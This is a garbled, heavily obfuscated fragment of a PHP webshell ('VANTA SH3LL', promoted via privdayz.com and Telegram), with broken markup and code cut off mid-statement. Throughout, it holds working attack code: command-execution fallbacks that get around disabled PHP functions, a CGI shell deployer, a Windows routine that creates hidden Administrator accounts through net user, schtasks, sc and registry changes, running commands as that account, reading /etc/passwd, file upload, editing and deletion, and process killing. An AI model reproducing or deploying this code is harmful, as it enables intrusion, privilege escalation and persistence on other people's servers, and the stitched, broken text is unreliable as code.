{ putenv("CGI_COMMAND=$c"); $out = getenv("CGI_COMMAND"); if (trim($out)) $ok = true; } else { if (function_exists($meth)) { if ($meth === $M[0]) { $out = @$meth($c.' 2>'.'&'.'1'); if (trim($out)) $ok = true; } else if ($meth === $M[1]) { $a=[]; $meth($c.' '.'2'.'>&'.'1', $a); $out = join("\n", $a); if (trim($out)) $ok = true; } else if ($meth === $M[2]) {  @$meth($c.' 2>'.'&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[3]) {  @$meth($c.' '.'2'.'>&1'); $out = ""; if (trim($out)) $ok = true; } else if ($meth === $M[4]) { $h=@$meth($c.' '.'2'.'>&1',"r"); if ($h) { while(!feof($h)) $out.=fread($h,4096); fclose($h); } if (trim($out)) $ok = true; } else if ($meth === $M[5]) { $desc = [1=>["pipe","w"], 2=>["pipe","w"]]; $p = @$meth($c.' 2>'.'&1', $desc, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); proc_close($p); if (trim($out)) $ok = true; } } } } if ($ok && trim($out)) { $R = $out; break; } } echo htmlspecialchars($R ?: "[X] No output / all methods blocked.\n");}?>
cgi/perl creator
".$ve5c970b653);}else{echo"RSS Error.";} ?> PHP; $f = fopen($phf,"w"); fwrite($f,$php_payload); fclose($f); chmod($phf,0755); $paths[] = ["Php c0mmand sh3ll VANTA", $phf]; $fullbase = $domain . ($dir ? $dir : ''); echo '<'.'i'.' c'.'las'.'s'.'="f'.'as '.'fa'.'-bi'.'oh'.'a'.'za'.'rd"'.'><'.'/i'.'> <'.'b'.'>CG'.'I d'.'e'.'plo'.'ye'.'d!'.' Al'.'l '.'chm'.'o'.'d '.'7'.'5'.'5.'.'<'.'/'.'b><'.'br'.'>'.'<'.'u'.'l c'.'las'.'s='.'"pz'.'car'.'d-'.'sh'.'e'.'l'.'ls-'.'l'.'ist'.'">'; foreach($paths as $sh) { $rel = $sh[1]; $url = $fullbase . '/' . $rel; $link = $url . ''; echo ''.''.htmlspecialchars($sh[0]).': '.'<'.'co'.'de'.'>'.htmlspecialchars($rel).'<'.'/c'.'ode'.'>'.' '.' '.' '.' <'.'a '.'hr'.'ef='.'"'.$link.'"'.' t'.'a'.'r'.'get'.'="'.'_'.'b'.'lan'.'k'.'">'.'Ope'.'n'.' '.' '.' '.''.'(ch'.'mod'.' '.'75'.'5'.')'.''.' '.' '.' '.' '.''; } echo '<'.'/u'.'l>'.'<'.'/di'.'v>'; } ?>
ultra admin creator byp4ss (Windows/2025) - by privdayz.com
&'.'1'); if (preg_match('/Po'.'r'.'tN'.'um'.'b'.'er\\'.'s+R'.'E'.'G_'.'D'.'WOR'.'D'.'\\s+'.'0'.'x'.'(['.'0-9'.'a'.'-f]'.'+'.')/i', $reg, $m)) { return hexdec($m[1]); } $netstat = v4nt4C('ne'.'t'.'s'.'ta'.'t'.' -'.'an'.' '.'|'.' fi'.'n'.'d '.'":'.'338'.'9"'); if (strpos($netstat, '33'.'8'.'9') !== false) { return 3389; } return 'Un'.'kn'.'o'.'wn'; } $rdp_port = detect_rdp_port(); echo "
RDP Port: " . htmlspecialchars($rdp_port) . "
"; ?> 
'.'&'.'1');
    if (trim($out)) return $out;
    $fallback = "timeout /T $timeout /NOBREAK & $cmd";
    $out2 = v4nt4C($fallback.' 2'.'>&1');
    if (trim($out2)) return $out2;
    return v4nt4C($cmd.' '.'2>&'.'1');
}
if (!isset($_SESSION['v'.'4'.'nt'.'4_w'.'inr'.'00t'.'_s'.'u'.'cce'.'s'.'s'])) $_SESSION['v4n'.'t'.'4_'.'wi'.'nr'.'00t'.'_'.'suc'.'ce'.'ss'] = false;
if (!isset($_SESSION['v4n'.'t4_'.'win'.'r00'.'t_'.'use'.'r'])) $_SESSION['v'.'4nt'.'4_w'.'i'.'nr'.'00t'.'_'.'u'.'s'.'er'] = '';
if (!isset($_SESSION['v4n'.'t4'.'_w'.'in'.'r00'.'t_'.'pas'.'s'])) $_SESSION['v4'.'nt'.'4_w'.'i'.'nr0'.'0t'.'_pa'.'s'.'s'] = '';

if ($_SERVER['REQ'.'U'.'ES'.'T_M'.'ET'.'HOD'] === 'POS'.'T' && isset($_POST['use'.'r'],$_POST['pas'.'s'])) {
    $u = preg_replace('/[^'.'a-z'.'A'.'-'.'Z0'.'-9'.'_\\'.'-'.']'.'/','',$_POST['u'.'s'.'er']);
    $p = $_POST['p'.'a'.'ss'];
    $mode = $_POST['m'.'ode'] ?? 'a'.'uto';
    $success = false;
    $methods = [];

    $methods[] = [
        "[*] net user (classic)",
        "net user \"$u\" \"$p\" /add && net localgroup Administrators \"$u\" /add"
    ];

    $methods[] = [
        "[*] PowerShell (background)",
        "powershell -Command \"net user $u $p /add; net localgroup Administrators $u /add\""
    ];

    $methods[] = [
        "[*] schtasks",
        "schtasks /create /tn winrrrrrr00t /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onstart /ru System"
    ];

    $methods[] = [
        "[*] at.exe",
        "at 12:00 cmd.exe /c \"net user $u $p /add && net localgroup Administrators $u /add\""
    ];

    $methods[] = [
        "[*] sc service hack",
        "sc create p0wnsvc binPath= \"cmd /c net user $u $p /add & net localgroup Administrators $u /add\" start= auto"
    ];

    $methods[] = [
        "[*] Registry AutoAdminLogon",
        "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f"
    ];

    $methods[] = [
        "[*] Fallback CMD",
        "cmd /c net user $u $p /add & net localgroup Administrators $u /add"
    ];

    $methods[] = [
        "[*] PowerShell Script Chain",
        "powershell -Command \"Start-Process cmd -ArgumentList '/c net user $u $p /add && net localgroup Administrators $u /add' -Verb runAs\""
    ];

    $methods[] = [
        "[*] Task Scheduler V2 (schtasks)",
        "schtasks /create /tn winr00t2 /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onlogon /ru System"
    ];

    foreach ($methods as $step) {
        list($label, $cmd) = $step;
        wout($label . "...");
        $res = prvd_exec_with_timeout($cmd, 9);
        wout($res);
        if (
            stripos($res, 'suc'.'ces'.'s') !== false || stripos($res, 'o'.'k') !== false ||
            stripos($res, 'Re'.'tu'.'rn'.'Va'.'lue'.' '.'='.' '.'0') !== false ||
            stripos($res, 'b'.'a'.''.'ar'.'') !== false ||
            stripos($res, 'al'.'r'.'ea'.'d'.'y '.'exi'.'st'.'s') !== false
        ) {
            wout("[+] Admin user injected!");
            $success = true;
            break;
        }
        sleep(1);
    }

    if ($success) {
        $_SESSION['v'.'4n'.'t4'.'_w'.'inr'.'00'.'t_'.'su'.'cc'.'ess'] = true;
        $_SESSION['v'.'4'.'n'.'t'.'4_'.'wi'.'nr0'.'0t'.'_u'.'s'.'e'.'r'] = $u;
        $_SESSION['v'.'4'.'n'.'t4'.'_'.'w'.'i'.'nr'.'0'.'0t'.'_pa'.'s'.'s'] = $p;
    wout("\n[+] 0wn3d! Admin user injected:\n[+] User: $u\n[+] Pass: $p");
    wout("[!] Info: Webshell cannot send commands as this user. Use RDP/SMB/WinRM with these credentials!");
    } else {
        $_SESSION['v'.'4nt'.'4_'.'w'.'in'.'r'.'00t'.'_'.'s'.'uc'.'c'.'es'.'s'] = false;
        wout("\n[!] r00t failed :: no vector worked, permission denied.");
    }
}
if ($_SESSION['v'.'4n'.'t4_'.'win'.'r0'.'0t'.'_su'.'cc'.'ess']) {
    $u = $_SESSION['v'.'4'.'nt4'.'_wi'.'n'.'r0'.'0t_'.'use'.'r'];
    $p = $_SESSION['v'.'4nt'.'4_w'.'inr'.'00'.'t'.'_pa'.'ss'];
    ?>
[+] Running as  |  Pass: 
 $cmdfile 2>&1\" /sc once /st 00:00 /ru \"$u\" /rp \"$p\"";
        $out1 = v4nt4C($scht.' '.'2'.'>'.'&'.'1');
        wout($out1);

        v4nt4C("schtasks /run /tn pzadmtask 2>&1");
        sleep(1);
        $output = @file_get_contents($cmdfile);
        if ($output && strlen($output) > 0) {
            wout("[+] Command executed as admin!\n" . $output);
            $success_cmd = true;
        }
        @v4nt4C('sc'.'h'.'tas'.'ks'.' /d'.'e'.'l'.'et'.'e '.'/tn'.' '.'pza'.'dmt'.'ask'.' /f'.' 2>'.'&'.'1');
        @unlink($cmdfile);
        if (!$success_cmd) {
            wout("[*] Trying service method...");
            $svc = 'sc '.'c'.'r'.'ea'.'te '.'pza'.'dms'.'v'.'c '.'b'.'in'.'Pa'.'t'.'h= '.'"cm'.'d'.' /'.'c '.$c.' '.'> '.$cmdfile.' 2>'.'&1"'.' '.'ob'.'j= '.'".\\'.'\\'.$u.'"'.' p'.'a'.'ss'.'wor'.'d'.'= "'.$p.'" s'.'t'.'ar'.'t='.' '.'dem'.'an'.'d';
            $out2 = v4nt4C($svc.' 2>'.'&'.'1');
            wout($out2);
            v4nt4C('sc '.'sta'.'r'.'t '.'pz'.'adm'.'s'.'v'.'c 2'.'>&'.'1');
            sleep(1);
            $output2 = @file_get_contents($cmdfile);
            if ($output2 && strlen($output2) > 0) {
                wout("[+] Service method: Command executed as admin!\n" . $output2);
                $success_cmd = true;
            }
            @v4nt4C('sc'.' de'.'let'.'e p'.'zad'.'m'.'sv'.'c '.'2>&'.'1');
            @unlink($cmdfile);
        }

        if (!$success_cmd) {
            wout("[*] PowerShell fallback...");
            $pw = 'po'.'wer'.'sh'.'ell'.' '.'-'.'Co'.'m'.'man'.'d '.'"'.'S'.'tar'.'t'.'-P'.'ro'.'c'.'e'.'ss'.' c'.'md '.'-A'.'rg'.'um'.'e'.'ntL'.'ist'.' \\\''.'/c '.$c.' '.'> '.$cmdfile.' '.'2>&'.'1\\\''.' '.'-'.'C'.'re'.'den'.'t'.'ia'.'l '.'(Ne'.'w-'.'Ob'.'jec'.'t '.'S'.'ys'.'t'.'e'.'m'.'.'.'Man'.'age'.'men'.'t'.'.A'.'u'.'tom'.'at'.'i'.'on'.'.'.'PS'.'C'.'r'.'ed'.'en'.'t'.'ia'.'l'.'(\\\''.$u.'\\\''.','.'(Co'.'n'.'ve'.'r'.'tT'.'o-S'.'e'.'c'.'ur'.'e'.'Str'.'ing'.' '.'\\\''.$p.'\\\' '.'-'.'AsP'.'l'.'a'.'inT'.'ex'.'t '.'-Fo'.'rc'.'e'.')'.')) '.'-W'.'in'.'do'.'w'.'S'.'tyl'.'e'.' Hi'.'d'.'de'.'n"';
            $out3 = v4nt4C($pw.' 2'.'>&1');
            wout($out3);
            sleep(1);
            $output3 = @file_get_contents($cmdfile);
            if ($output3 && strlen($output3) > 0) {
                wout("[+] PowerShell: Command executed as admin!\n" . $output3);
                $success_cmd = true;
            }
            @unlink($cmdfile);
        }

        if (!$success_cmd) {
            wout("[!] Admin command failed. Try RDP / manual login?");
        }
    }
    ?>
safe mode:
disable functions: N'.'o'.'ne'.''; } else { echo '<'.'sp'.'a'.'n c'.'l'.'as'.'s='.'"v4'.'nt'.'4'.'-l'.'ite'.'-v'.'al'.' v4'.'nt'.'4-'.'li'.'te'.'-o'.'ff"'.' s'.'ty'.'le'.'='.'"'.'whi'.'t'.'e'.'-s'.'pa'.'c'.'e:'.'nor'.'m'.'a'.'l'.';'.'"'.'>' . str_replace(",", ", ", $d1sxb) . ''; } ?>
create folder create file
/'.''; foreach ($pwd as $i => $v) { $build .= "/" . $v; echo '' . $v . ''.'/'; } ?>
VANTA SH3LL v1.0 - join telegram channel: https://t.me/privdayz
read passwd
view /etc/passwd
×
domains
×
create folder
×

back
'.''.' '.'F'.'old'.'er'.' '.'cre'.'at'.'ed'.':'.' <'.'b>' . htmlspecialchars($folder) . '<'.'/di'.'v>'; } else { echo '<'.'di'.'v '.'s'.'t'.'yle'.'="'.'co'.'lor'.':#e'.'539'.'35;'.'ma'.'rgi'.'n:'.'1'.'2'.'px '.'0'.' 0'.' 0'.';f'.'o'.'n'.'t-'.'s'.'ize'.':1.'.'0'.'8'.'em;'.'t'.'ex'.'t'.'-'.'al'.'ign'.':ce'.'nt'.'er'.';">'.''.' '.'Fai'.'led'.' '.'t'.'o '.'c'.'re'.'a'.'te'.' f'.'ol'.'der'.'!<'.'/d'.'i'.'v>'; } } else { echo '<'.'di'.'v'.' '.'st'.'yl'.'e="'.'co'.'lor'.':'.'#b7'.'1c'.'1c;'.'ma'.'r'.'gin'.':'.'12'.'p'.'x '.'0 0'.' '.'0'.';f'.'on'.'t-'.'si'.'ze:'.'1'.'.0'.'8'.'e'.'m'.';t'.'e'.'xt-'.'al'.'ig'.'n:c'.'ent'.'er;'.'"'.'><'.'/i>'.' Fo'.'lde'.'r a'.'l'.'rea'.'dy'.' ex'.'is'.'ts!'.''; } } ?>
create file
×

back
<'.'i '.'cla'.'ss'.'="f'.'as'.' fa'.'-'.'che'.'ck-'.'cir'.'cle'.'">'.'<'.'/i>'.' Fi'.'le '.'cr'.'e'.'ate'.'d: '.'<'.'b'.'>' . htmlspecialchars($new_file) . '<'.'/d'.'iv>'; } else { echo '<'.'d'.'iv'.' s'.'t'.'y'.'le'.'="'.'c'.'ol'.'or:'.'#'.'e5'.'39'.'35'.';m'.'ar'.'g'.'i'.'n'.':1'.'2px'.' 0 '.'0 '.'0'.';'.'fon'.'t-s'.'i'.'ze'.':1.'.'08'.'em'.';te'.'x'.'t'.'-al'.'ig'.'n:'.'c'.'e'.'n'.'ter'.';">'.'<'.'i'.' c'.'la'.'ss='.'"f'.'as '.'fa'.'-'.'ti'.'me'.'s-'.'c'.'i'.'rc'.'le'.'">'.'<'.'/i'.'> '.'F'.'a'.'i'.'led'.' '.'to '.'cr'.'ea'.'te '.'f'.'ile'.'!'; } } else { echo '<'.'di'.'v'.' s'.'ty'.'l'.'e='.'"c'.'olo'.'r:#'.'b71'.'c'.'1c;'.'m'.'a'.'rg'.'in:'.'12'.'px '.'0 0'.' 0;'.'f'.'ont'.'-'.'s'.'iz'.'e:'.'1'.'.0'.'8e'.'m;t'.'ext'.'-al'.'i'.'g'.'n:c'.'ent'.'er'.';"'.'><'.'i c'.'la'.'s'.'s='.'"'.'fa'.'s'.' fa'.'-e'.'xc'.'la'.'ma'.'ti'.'on'.'-c'.'irc'.'le'.'">'.'<'.'/i>'.' '.'Fi'.'le'.' al'.'r'.'ea'.'dy'.' ex'.'ist'.'s'.'!'; } } ?>
rename
×

change permission
×

&1"); if (!empty($name)) { $pkillOutput = cmd("\x70\x6b\x69\x6c\x6c\x20\x2d\x39 " . $name . " 2>&1"); success(); } else { failed(); } } exit; } if (isset($_POST['pr'.'iv'.'day'.'z'.'-up'.'-'.'su'.'bmi'.'t'])) { $nf = $_FILES['pri'.'v'.'da'.'yz'.'-u'.'p'.'loa'.'d']['na'.'m'.'e'] ?? ''; $tf = $_FILES['pr'.'ivd'.'ayz'.'-u'.'plo'.'a'.'d']['t'.'m'.'p_n'.'am'.'e'] ?? ''; $slash = "\x2f"; $dst = $VANTAxas[0]() . $slash . $nf; $fn = ''; foreach ([109,111,118,101,95,117,112,108,111,97,100,101,100,95,102,105,108,101] as $c) $fn .= chr($c); if ($fn && $fn($tf, $dst)) { success(); } else { failed(); } } function generateRandomString($length = 10) { $characters = '0'.'1'.'234'.'567'.'89a'.'bc'.'de'.'f'.'gh'.'i'.'j'.'klm'.'n'.'opq'.'rst'.'u'.'vw'.'x'.'yz'.'A'.'BCD'.'EFG'.'HI'.'JK'.'LM'.'NOP'.'QRS'.'TU'.'VW'.'XY'.'Z'; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[random_int(0, $charactersLength - 1)]; } return $randomString; } if (isset($_POST['s'.'ave'.'-ed'.'it'.'o'.'r'])) { $xjytx = $VANTAxas[0]() . "\x2f" . unx($_GET['f']); $k3rz9 = $_POST['cod'.'e-e'.'dit'.'or']; $mth1 = ''; foreach([102,105,108,101,95,112,117,116,95,99,111,110,116,101,110,116,115] as $z) $mth1 .= chr($z); $mth2 = ''; foreach([102,111,112,101,110] as $z) $mth2 .= chr($z); $mth3 = ''; foreach([102,119,114,105,116,101] as $z) $mth3 .= chr($z); $mth4 = ''; foreach([102,99,108,111,115,101] as $z) $mth4 .= chr($z); $mth5 = ''; foreach([99,111,112,121] as $z) $mth5 .= chr($z); $mth6 = ''; foreach([115,104,101,108,108,95,101,120,101,99] as $z) $mth6 .= chr($z); $r9u3 = false; if (function_exists($mth1) && @$mth1($xjytx, $k3rz9) !== false) { $r9u3 = true; } else if (function_exists($mth2) && function_exists($mth3) && function_exists($mth4)) { $f = @$mth2($xjytx, "w"); if ($f) { @$mth3($f, $k3rz9); @$mth4($f); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); } } else if (function_exists($mth5)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { $r9u3 = @$mth5($tmp, $xjytx); @unlink($tmp); } } else if (function_exists($mth6)) { $tmp = sys_get_temp_dir() . "/" . uniqid("edit_"); if (@$mth1($tmp, $k3rz9) !== false) { @$mth6("cp " . escapeshellarg($tmp) . " " . escapeshellarg($xjytx)); $r9u3 = (filesize($xjytx) >= strlen($k3rz9)*0.7); @unlink($tmp); } } if ($r9u3) { success(); } else { failed(); } } if (isset($_GET['ad'.'mi'.'ner'])) { $URL = "https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php"; $target = "adminer.php"; $content = ''; if (ini_get('al'.'l'.'ow'.'_u'.'rl_'.'fo'.'pe'.'n')) { $content = @file_get_contents($URL); } if (!$content && function_exists('c'.'u'.'r'.'l_i'.'ni'.'t')) { $ch = curl_init($URL); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $content = curl_exec($ch); curl_close($ch); } if ($content && strlen($content) > 50000) { file_put_contents($target, $content); success(); } else { echo ""; } } function chDx2x($cmd22) { $a = [115,104,101,108,108,95,101,120,101,99]; $fx = ''; foreach($a as $ac) $fx .= chr($ac); return $fx($cmd22); } if (isset($_POST['sub'.'mit'.'-'.'act'.'ion'])) { $u5w8d = $_POST['c'.'hec'.'k']; $jv8s3 = $_POST['pr'.'ivd'.'ayz'.'-'.'s'.'el'.'e'.'c'.'t']; $bvqzp = $VANTAxas[0]; $b1s7a = $VANTAxas[24]; $y4sdg = $VANTAxas[3]; $v9fzq = function($p){ return is_dir($p); }; $z9ntq = function($a,$b){ return str_replace("\\", "/", $a); }; $n4hxy = function($f,$d){ return xtr4cVANTA($f, $d); }; $r5kbm = function($f,$z){ return compressToZip($f, $z); }; if ($jv8s3 == "\x64\x65\x6c\x65\x74\x65") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($v9fzq($vcpk)) { $rmdir = unlinkDir($vcpk); $rmdir ? success() : failed(); } elseif ($y4sdg($vcpk)) { $rmfile = $b1s7a($vcpk); $rmfile ? success() : failed(); } else { failed(); } } } elseif ($jv8s3 == "\x75\x6e\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($n4hxy($vcpk, $qkpl . "\x2f") === true) { success(); } else { failed(); } } } elseif ($jv8s3 == "\x7a\x69\x70") { foreach ($u5w8d as $z0) { $qkpl = $z9ntq($bvqzp(), "/"); $vcpk = $qkpl . "\x2f" . $z0; if ($y4sdg($vcpk)) { $r5kbm($vcpk, pathinfo($vcpk, PATHINFO_FILENAME) . ".zip"); } } } } if (isset($_POST['s'.'ubm'.'i'.'t'])) { if (isset($_POST['cr'.'ea'.'te'.'_f'.'old'.'er']) && $_POST['cre'.'a'.'te'.'_fo'.'l'.'de'.'r']) { $q7hjp = $_POST['c'.'rea'.'te_'.'fol'.'d'.'er']; $s2f6x = $VANTAxas[12]; if (!file_exists($q7hjp)) { $z9mqa = @mkdir($q7hjp, 0755, true);} else { $z9mqa = true; } if ($z9mqa) { success(); } else { failed(); } } else if (isset($_POST['c'.'re'.'ate'.'_'.'fi'.'le']) && $_POST['cre'.'ate'.'_f'.'ile']) { $k4vhz = $_POST['cre'.'at'.'e_'.'fil'.'e']; $t2upm = $VANTAxas[13]; $x6wnr = $t2upm($k4vhz); if ($x6wnr) { success(); } else { failed(); } } else if (isset($_POST['r'.'ena'.'me'.'Fil'.'e']) && $_POST['ren'.'ame'.'F'.'il'.'e']) { $d9yxs = $_POST['r'.'en'.'am'.'e'.'Fi'.'le']; $h8rfg = $VANTAxas[15]; $m5qlp = $h8rfg(unx($_GET['r'.'e']), $d9yxs); if ($m5qlp) { success(); } else { failed(); } } else if (isset($_POST['ch'.'Fil'.'e']) && $_POST['c'.'h'.'Fil'.'e']) { $y4gsn = $_POST['chF'.'i'.'l'.'e']; $v3kzm = octdec($y4gsn); $p9wfu = $VANTAxas[30](unx($_GET['c'.'h']), $v3kzm); if ($p9wfu) { success(); } else { failed(); } } } if (isset($_GET['re'.'sp'.'ons'.'e']) && $_GET['res'.'pon'.'se'] == "success") { echo ""; } else if (isset($_GET['re'.'s'.'p'.'o'.'nse']) && $_GET['re'.'s'.'po'.'nse'] == "failed") { echo ""; } function success() {echo '';} function failed(){echo '';} function vantaFormat($bytes) {$types = array(''.'B'.'', '<'.'s'.'p'.'an'.' c'.'l'.'a'.'ss='.'"fi'.'l'.'e'.'-si'.'ze"'.'>K'.'B<'.'/sp'.'a'.'n'.'>', ''.'MB'.'', ''.'GB'.'<'.'/sp'.'an'.'>', 'T'.'B<'.'/s'.'p'.'an>'); for ($i = 0; $bytes >= 1024 && $i< (count($types) - 1); $bytes /= 1024, $i++); return (round($bytes, 2) . " " . $types[$i]);} function vanta_PR1V($n){ $y = ''; for ($i = 0; $i< strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y;} function unx($y){ $n = ''; for ($i = 0; $i< strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n;} function compressToZip($sourceFile, $zipFilename){ $zip = new ZipArchive(); if ($zip->open($zipFilename, ZipArchive::CREATE) === TRUE) { $zip->addFile($sourceFile, basename($sourceFile)); $zip->close(); success(); } else { failed(); } } function r3mvx($val) { $tex = str_replace("/", "", $val); $tex1 = str_replace(":", "", $tex); $tex2 = str_replace("_", "", $tex1); $tex3 = str_replace(" ", "", $tex2); $tex4 = str_replace(".", "", $tex3); return $tex4; } function unlinkDir($dir) { $d1Xe = array($dir); $files = array(); for ($i = 0;; $i++) { if (isset($d1Xe[$i])) $dir = $d1Xe[$i]; else break; if ($opn = @opendir($dir)) { while ($rd = @readdir($opn)) { if ($rd != "\x2e" && $rd != "\x2e\x2e") { $pth = $dir . "\x2f" . $rd; if ($GLOBALS['V'.'A'.'NT'.'Ax'.'a'.'s'][2]($pth)) { $d1Xe[] = $pth; } else { $files[] = $pth; } } } closedir($opn); } } foreach ($files as $file) { if (!@$GLOBALS['VA'.'NTA'.'xas'][24]($file)) { return false; } } $d1Xe = array_reverse($d1Xe); foreach ($d1Xe as $d1x2) { if (!@$GLOBALS['V'.'ANT'.'A'.'xas'][25]($d1x2)) { return false; } } return true; } function prvFx1($value) { $n4mX = $value; $ext3F = pathinfo($value, PATHINFO_EXTENSION); if (strlen($n4mX) > 30) { return substr($n4mX, 0, 30) . "\x2e\x2e\x2e"; } else { return $value; } } function xtr4cVANTA($VANTAarch, $VANTAaext) { $zip = new ZipArchive(); $methOpen = chDxzZ('111'.','.'1'.'12'.',10'.'1,1'.'10'); $methExtract = chDxXZ('6'.'57'.'8'.'7'.'47'.'261'.'637'.'454'.'6'.'f'); $methClose = chDxzZ([99,108,111,115,101]); if ($zip->$methOpen($VANTAarch) === TRUE) { $zip->$methExtract($VANTAaext); $zip->$methClose(); return true; } else { return false; } } function p3rms($file){$p3rxa=$GLOBALS['VA'.'NT'.'Axa'.'s'][6]($file);if(($p3rxa&0xC000)==0xC000){$info='s';}elseif(($p3rxa&0xA000)==0xA000){$info='l';}elseif(($p3rxa&0x8000)==0x8000){$info='-';}elseif(($p3rxa&0x6000)==0x6000){$info='b';}elseif(($p3rxa&0x4000)==0x4000){$info='d';}elseif(($p3rxa&0x2000)==0x2000){$info='c';}elseif(($p3rxa&0x1000)==0x1000){$info='p';}else{$info='u';}$info.=(($p3rxa&0x0100)?'r':'-');$info.=(($p3rxa&0x0080)?'w':'-');$info.=(($p3rxa&0x0040)?(($p3rxa&0x0800)?'s':'x'):(($p3rxa&0x0800)?'S':'-'));$info.=(($p3rxa&0x0020)?'r':'-');$info.=(($p3rxa&0x0010)?'w':'-');$info.=(($p3rxa&0x0008)?(($p3rxa&0x0400)?'s':'x'):(($p3rxa&0x0400)?'S':'-'));$info.=(($p3rxa&0x0004)?'r':'-');$info.=(($p3rxa&0x0002)?'w':'-');$info.=(($p3rxa&0x0001)?(($p3rxa&0x0200)?'t':'x'):(($p3rxa&0x0200)?'T':'-'));return $info;} ?>